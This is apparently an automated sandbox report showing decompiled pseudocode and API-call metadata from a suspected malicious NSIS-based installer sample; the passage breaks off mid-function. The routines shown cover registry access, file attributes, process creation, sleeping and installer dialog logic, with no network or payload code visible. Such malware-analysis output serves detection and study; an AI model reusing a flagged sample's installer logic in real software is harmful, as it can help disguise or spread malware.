                                                                        			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                        				void* _t7;
                                                                        				long _t8;
                                                                        				void* _t9;
                                                                        
                                                                        				_t7 = E00406454(_a4,  &_a12);
                                                                        				if(_t7 != 0) {
                                                                        					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 = 6;
                                                                        				return _t9;
                                                                        			}






                                                                        0x004064df
                                                                        0x004064e6
                                                                        0x004064f9
                                                                        0x00000000
                                                                        0x004064f9
                                                                        0x004064ea
                                                                        0x00000000

                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                        • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                                        • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                        • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004015A3() {
                                                                        				int _t5;
                                                                        				void* _t11;
                                                                        				int _t14;
                                                                        
                                                                        				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                        				_t14 = _t5;
                                                                        				if(_t14 == 0) {
                                                                        					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
                                                                        				return 0;
                                                                        			}






                                                                        0x004015ae
                                                                        0x004015b4
                                                                        0x004015b6
                                                                        0x0040292e
                                                                        0x0040292e
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
                                                                        • Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
                                                                        • Opcode Fuzzy Hash: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
                                                                        • Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404610(int _a4) {
                                                                        				struct HWND__* _t2;
                                                                        				long _t3;
                                                                        
                                                                        				_t2 =  *0x429238;
                                                                        				if(_t2 != 0) {
                                                                        					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                        					return _t3;
                                                                        				}
                                                                        				return _t2;
                                                                        			}





                                                                        0x00404610
                                                                        0x00404617
                                                                        0x00404622
                                                                        0x00000000
                                                                        0x00404622
                                                                        0x00404628

                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                        • Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
                                                                        • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                        • Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004035F8(long _a4) {
                                                                        				long _t2;
                                                                        
                                                                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00403606
                                                                        0x0040360c

                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004045F9(int _a4) {
                                                                        				long _t2;
                                                                        
                                                                        				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00404607
                                                                        0x0040460d

                                                                        APIs
                                                                        • SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                        • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                        • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                        • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004045E6(int _a4) {
                                                                        				int _t2;
                                                                        
                                                                        				_t2 = EnableWindow( *0x423744, _a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x004045f0
                                                                        0x004045f6

                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,004043BD), ref: 004045F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                        • Instruction ID: 97f05af551d2e904d84950d91e3a9b28448307360fbef328a82585e9573e9e03
                                                                        • Opcode Fuzzy Hash: b9cabee76f1705efe6df0b682491f715d60f75bd340f366a7093c5de42737780
                                                                        • Instruction Fuzzy Hash: DBA001B6604500ABDE129F61EF09D0ABB72EBA4B02B418579A28590034CA365961FB1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E00401FA4(void* __ecx) {
                                                                        				void* _t9;
                                                                        				intOrPtr _t13;
                                                                        				void* _t15;
                                                                        				void* _t17;
                                                                        				void* _t20;
                                                                        				void* _t22;
                                                                        
                                                                        				_t17 = __ecx;
                                                                        				_t19 = E00402DA6(_t15);
                                                                        				E004056CA(0xffffffeb, _t7);
                                                                        				_t9 = E00405C4B(_t19); // executed
                                                                        				_t20 = _t9;
                                                                        				if(_t20 == _t15) {
                                                                        					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                        				} else {
                                                                        					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                        						_t13 = E00406AE0(_t17, _t20);
                                                                        						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                        							if(_t13 != _t15) {
                                                                        								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                        							}
                                                                        						} else {
                                                                        							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                        						}
                                                                        					}
                                                                        					_push(_t20);
                                                                        					CloseHandle();
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                                        				return 0;
                                                                        			}









                                                                        0x00401fa4
                                                                        0x00401faa
                                                                        0x00401faf
                                                                        0x00401fb5
                                                                        0x00401fba
                                                                        0x00401fbe
                                                                        0x0040292e
                                                                        0x00401fc4
                                                                        0x00401fc7
                                                                        0x00401fca
                                                                        0x00401fd2
                                                                        0x00401fe1
                                                                        0x00401fe3
                                                                        0x00401fe3
                                                                        0x00401fd4
                                                                        0x00401fd8
                                                                        0x00401fd8
                                                                        0x00401fd2
                                                                        0x00401fea
                                                                        0x00401feb
                                                                        0x00401feb
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,004030A8), ref: 00405725
                                                                          • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll), ref: 00405737
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                          • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                                          • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                          • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                          • Part of subcall function 00406AE0: GetExitCodeProcess.KERNEL32 ref: 00406B13
                                                                          • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2972824698-0
                                                                        • Opcode ID: 8167ccd890c8e3f23bc8d286bd9f1b71588b31937b09ab415f675532f6c5344c
                                                                        • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                                        • Opcode Fuzzy Hash: 8167ccd890c8e3f23bc8d286bd9f1b71588b31937b09ab415f675532f6c5344c
                                                                        • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004014D7(intOrPtr __edx) {
                                                                        				long _t3;
                                                                        				void* _t7;
                                                                        				intOrPtr _t10;
                                                                        				void* _t13;
                                                                        
                                                                        				_t10 = __edx;
                                                                        				_t3 = E00402D84(_t7);
                                                                        				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
                                                                        				if(_t3 <= 1) {
                                                                        					_t3 = 1;
                                                                        				}
                                                                        				Sleep(_t3); // executed
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t13 - 4));
                                                                        				return 0;
                                                                        			}







                                                                        0x004014d7
                                                                        0x004014d8
                                                                        0x004014e1
                                                                        0x004014e4
                                                                        0x004014e8
                                                                        0x004014e8
                                                                        0x004014ea
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
                                                                        • Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
                                                                        • Opcode Fuzzy Hash: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
                                                                        • Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E724912BB() {
                                                                        				void* _t3;
                                                                        
                                                                        				_t3 = GlobalAlloc(0x40,  *0x7249506c +  *0x7249506c); // executed
                                                                        				return _t3;
                                                                        			}




                                                                        0x724912c5
                                                                        0x724912cb

                                                                        APIs
                                                                        • GlobalAlloc.KERNELBASE(00000040,?,724912DB,?,7249137F,00000019,724911CA,-000000A0), ref: 724912C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AllocGlobal
                                                                        • String ID:
                                                                        • API String ID: 3761449716-0
                                                                        • Opcode ID: e51787d1fda3a5d0d0eff1abbc46408b9841173367663d65ef4b2c810f6e4582
                                                                        • Instruction ID: bea85bf12bc84814baa3aaf57e387f2fac5181e9717a990820538e0d7bfe9778
                                                                        • Opcode Fuzzy Hash: e51787d1fda3a5d0d0eff1abbc46408b9841173367663d65ef4b2c810f6e4582
                                                                        • Instruction Fuzzy Hash: F4B01272A80000DFEE048B65CC06F343254E710301F244404F640F0180C12048008D34
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				long _v16;
                                                                        				long _v20;
                                                                        				long _v24;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				long _v36;
                                                                        				char _v40;
                                                                        				unsigned int _v44;
                                                                        				signed int _v48;
                                                                        				WCHAR* _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				intOrPtr _v68;
                                                                        				WCHAR* _v72;
                                                                        				void _v76;
                                                                        				struct HWND__* _v80;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr _t82;
                                                                        				long _t87;
                                                                        				short* _t89;
                                                                        				void* _t95;
                                                                        				signed int _t96;
                                                                        				int _t109;
                                                                        				signed short _t114;
                                                                        				signed int _t118;
                                                                        				struct HWND__** _t122;
                                                                        				intOrPtr* _t138;
                                                                        				WCHAR* _t146;
                                                                        				unsigned int _t150;
                                                                        				signed int _t152;
                                                                        				unsigned int _t156;
                                                                        				signed int _t158;
                                                                        				signed int* _t159;
                                                                        				signed int* _t160;
                                                                        				struct HWND__* _t166;
                                                                        				struct HWND__* _t167;
                                                                        				int _t169;
                                                                        				unsigned int _t197;
                                                                        
                                                                        				_t156 = __edx;
                                                                        				_t82 =  *0x422720; // 0x70d9dc
                                                                        				_v32 = _t82;
                                                                        				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                        				if(_a8 == 0x40b) {
                                                                        					E00405CAC(0x3fb, _t146);
                                                                        					E004068EF(_t146);
                                                                        				}
                                                                        				_t167 = _a4;
                                                                        				if(_a8 != 0x110) {
                                                                        					L8:
                                                                        					if(_a8 != 0x111) {
                                                                        						L20:
                                                                        						if(_a8 == 0x40f) {
                                                                        							L22:
                                                                        							_v8 = _v8 & 0x00000000;
                                                                        							_v12 = _v12 & 0x00000000;
                                                                        							E00405CAC(0x3fb, _t146);
                                                                        							if(E0040603F(_t186, _t146) == 0) {
                                                                        								_v8 = 1;
                                                                        							}
                                                                        							E00406668(0x421718, _t146);
                                                                        							_t87 = E00406A35(1);
                                                                        							_v16 = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								L30:
                                                                        								E00406668(0x421718, _t146);
                                                                        								_t89 = E00405FE2(0x421718);
                                                                        								_t158 = 0;
                                                                        								if(_t89 != 0) {
                                                                        									 *_t89 = 0;
                                                                        								}
                                                                        								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                        									goto L35;
                                                                        								} else {
                                                                        									_t169 = 0x400;
                                                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                        									asm("cdq");
                                                                        									_v48 = _t109;
                                                                        									_v44 = _t156;
                                                                        									_v12 = 1;
                                                                        									goto L36;
                                                                        								}
                                                                        							} else {
                                                                        								_t159 = 0;
                                                                        								if(0 == 0x421718) {
                                                                        									goto L30;
                                                                        								} else {
                                                                        									goto L26;
                                                                        								}
                                                                        								while(1) {
                                                                        									L26:
                                                                        									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                                        									if(_t114 != 0) {
                                                                        										break;
                                                                        									}
                                                                        									if(_t159 != 0) {
                                                                        										 *_t159 =  *_t159 & _t114;
                                                                        									}
                                                                        									_t160 = E00405F83(0x421718);
                                                                        									 *_t160 =  *_t160 & 0x00000000;
                                                                        									_t159 = _t160;
                                                                        									 *_t159 = 0x5c;
                                                                        									if(_t159 != 0x421718) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L30;
                                                                        									}
                                                                        								}
                                                                        								_t150 = _v44;
                                                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                        								_v44 = _t150 >> 0xa;
                                                                        								_v12 = 1;
                                                                        								_t158 = 0;
                                                                        								__eflags = 0;
                                                                        								L35:
                                                                        								_t169 = 0x400;
                                                                        								L36:
                                                                        								_t95 = E00404F52(5);
                                                                        								if(_v12 != _t158) {
                                                                        									_t197 = _v44;
                                                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                        										_v8 = 2;
                                                                        									}
                                                                        								}
                                                                        								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                                        									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                                        									if(_v12 == _t158) {
                                                                        										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                                        									} else {
                                                                        										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                                        									}
                                                                        								}
                                                                        								_t96 = _v8;
                                                                        								 *0x42a304 = _t96;
                                                                        								if(_t96 == _t158) {
                                                                        									_v8 = E0040140B(7);
                                                                        								}
                                                                        								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                        									_v8 = _t158;
                                                                        								}
                                                                        								E004045E6(0 | _v8 == _t158);
                                                                        								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                                        									E00404A0E();
                                                                        								}
                                                                        								 *0x423738 = _t158;
                                                                        								goto L53;
                                                                        							}
                                                                        						}
                                                                        						_t186 = _a8 - 0x405;
                                                                        						if(_a8 != 0x405) {
                                                                        							goto L53;
                                                                        						}
                                                                        						goto L22;
                                                                        					}
                                                                        					_t118 = _a12 & 0x0000ffff;
                                                                        					if(_t118 != 0x3fb) {
                                                                        						L12:
                                                                        						if(_t118 == 0x3e9) {
                                                                        							_t152 = 7;
                                                                        							memset( &_v76, 0, _t152 << 2);
